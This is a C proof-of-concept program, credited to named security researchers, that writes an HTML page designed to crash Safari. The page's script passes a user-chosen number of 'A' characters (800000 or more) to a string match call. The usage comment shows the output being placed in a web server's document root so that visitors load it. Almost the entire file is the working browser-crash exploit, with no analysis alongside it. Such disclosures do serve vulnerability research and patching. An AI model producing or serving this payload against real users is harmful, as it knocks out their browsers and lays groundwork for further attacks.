/*PoC for Safari crash discovered by
Alberto Ortega @a0rtega, alberto[@]pentbox[.]net
http://www.livehacking.com/category/vulnerability/apple-vulnerability/
This PoC written by
Larry W. Cashdollar http://vapid.dhs.org @lcashdol
This PoC creates an html file to be served out by a normal webserver.
It seems the browsers begin to crash when the output
size is 800000+.
usage: ./safari_crash 800000 /var/www/html/crash.html
*/
#include <stdio.h>
#include <stdlib.h>
int
main (int argc, char *argv[])
{
int x = 0;
FILE *fout;
char *payload = "<html>\n<head><title>Crash Safari PoC";
char *payload2="</title></head>\n<script
type=\"text/javascript\">\nvar s = \"PoC\";\ns.match(\"\0";
char *payload3 = "\");\n</script>\n</html>\0";
if (argc < 3)
{
printf
("Safari Crash PoC\nPlease supply buffer length and filename.\nEx
:%s 800000 crash.html\n",
argv[0]);
exit (0);
}
fout = fopen (argv[2], "w");
fprintf (fout, "%s", payload);
fprintf (fout, "Size : %s x A",argv[1]);
fprintf (fout,"%s",payload2);
while (x < atoi (argv[1]))
{
fprintf (fout, "A");
x++;
}
fprintf (fout, "%s", payload3);
fclose (fout);
return (0);
}
